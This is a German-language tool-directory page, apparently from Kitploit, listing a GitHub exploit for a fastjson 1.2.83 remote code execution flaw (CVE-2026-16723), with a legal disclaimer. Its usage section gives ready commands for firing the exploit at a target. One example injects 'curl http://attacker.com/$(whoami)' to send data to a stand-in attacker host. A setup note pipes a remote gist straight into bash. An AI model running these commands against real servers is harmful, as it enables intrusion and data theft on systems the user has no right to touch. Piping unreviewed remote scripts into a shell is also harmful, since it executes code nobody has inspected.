Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-16723 — CVE-2026-16723 | Kitploit
Tools/GitHubGitHub/horkimhab/cve-2026-16723
Lernen & Bildung
GitHubhorkimhab/cve-2026-16723

CVE-2026-16723

CVE-2026-16723

Repository anzeigenWebseite
11vor 25 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-16723

Spenden

Unterstützen Sie die Wartung dieses Projekts mit PayPal oder durch Scannen des QR-Codes unten.

paypal

QR-Code für Spenden

⚡ Einfache Nutzung

Verwenden Sie dieses Projekt nur in sicheren und autorisierten Umgebungen wie:

  • Lokale virtuelle Maschinen
  • Docker-Container
  • Isolierte Laborumgebungen
  • Autorisierte Penetrationstest-Umgebungen

Beispiel-Setup:

root@kitploit:~
git clone https://github.com/HORKimhab/CVE-2026-16723
cd CVE-2026-16723

# Download fastjson JAR (optional - script will auto-download)
wget https://repo1.maven.org/maven2/com/alibaba/fastjson/1.2.83/fastjson-1.2.83.jar

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirments
pip install -r requirements.txt

Beispielverwendung:

root@kitploit:~
# Basic exploit
python CVE-2026-16723.py -t http://localhost:8080/parse

# Custom command
python CVE-2026-16723.py -t http://localhost:8080/parse -c "id > /tmp/result"

# With custom IP and port
python CVE-2026-16723.py -t http://localhost:8080/parse -c "whoami" --remote-ip 192.168.1.100 --port 9000

# HTTPS target
python CVE-2026-16723.py -t https://target.com/api/parse -c "curl http://attacker.com/$(whoami)" --insecure

# Using proxy
python CVE-2026-16723.py -t http://localhost:8080/parse --proxy http://127.0.0.1:8080

# Custom FD range
python CVE-2026-16723.py -t http://localhost:8080/parse --fd-range 10-50

# Quiet mode
python CVE-2026-16723.py -t http://localhost:8080/parse --quiet

Hinweis:

  • Wenn Sie von einem anderen Projekt klonen, müssen Sie curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y ausführen, um das verschachtelte Verzeichnis .git zu bereinigen.
  • z. B.: cve-2025-46822.sh, cve-2025-46822-lab.sh, ...

Quellen und Referenzen

  • https://fearsoff.org/research/fastjson-1-2-83-rce
  • https://thehackernews.com/2026/07/fastjson-1x-rce-vulnerability-targeted.html
  • https://aiweekly.co/alerts/alibabas-fastjson-1x-hit-by-active-rce-exploits-no-patch

📚 Repository für Cybersicherheitsbildung und -forschung

Ein Repository zum Lernen, Testen und Erforschen von Cybersicherheitskonzepten in kontrollierten Umgebungen.


⚠️ Sicherheits- & Rechtshinweis

Zweck

Dieses Repository dient ausschließlich zu Bildungs- und autorisierten Sicherheitsforschungszwecken.

Es soll Nutzern helfen, Folgendes zu lernen:

  • Sicherheitslücken
  • Sandbox- und Isolationskonzepte
  • Sichere Codierung und defensive Praktiken

Nur zur autorisierten Nutzung

Verwenden Sie dieses Repository nur in Umgebungen, in denen Sie die Berechtigung haben, wie:

  • Persönliche Labore oder virtuelle Maschinen
  • Docker- oder isolierte Umgebungen
  • Autorisierte Penetrationstests
  • Cybersicherheitsschulungen oder akademische Forschung

Unbefugte oder illegale Nutzung ist strengstens untersagt.


Keine Haftung

Der Autor und die Mitwirkenden sind nicht verantwortlich für Schäden, Missbrauch, rechtliche Probleme oder Verluste, die durch dieses Projekt verursacht werden.

Durch die Nutzung dieses Repositorys stimmen Sie Folgendem zu:

  • Sie sind für Ihre eigenen Handlungen verantwortlich
  • Sie werden es legal und ethisch verwenden
  • Das Projekt wird ohne Gewährleistung bereitgestellt

Ethische Nutzung

Dieses Projekt ist vorgesehen für:

  • Defensive Sicherheitsforschung
  • Cybersicherheitsbildung
  • Sensibilisierung für Sicherheitslücken
  • Forschung zu sicheren Systemen und Software

Bitte befolgen Sie verantwortungsvolle Offenlegungspraktiken (Responsible Disclosure) und halten Sie sich an alle geltenden Gesetze.


Kontakt

Für verantwortungsvolle Offenlegung oder Zusammenarbeit kontaktieren Sie den Repository-Betreuer über GitHub.

Tool herunterladen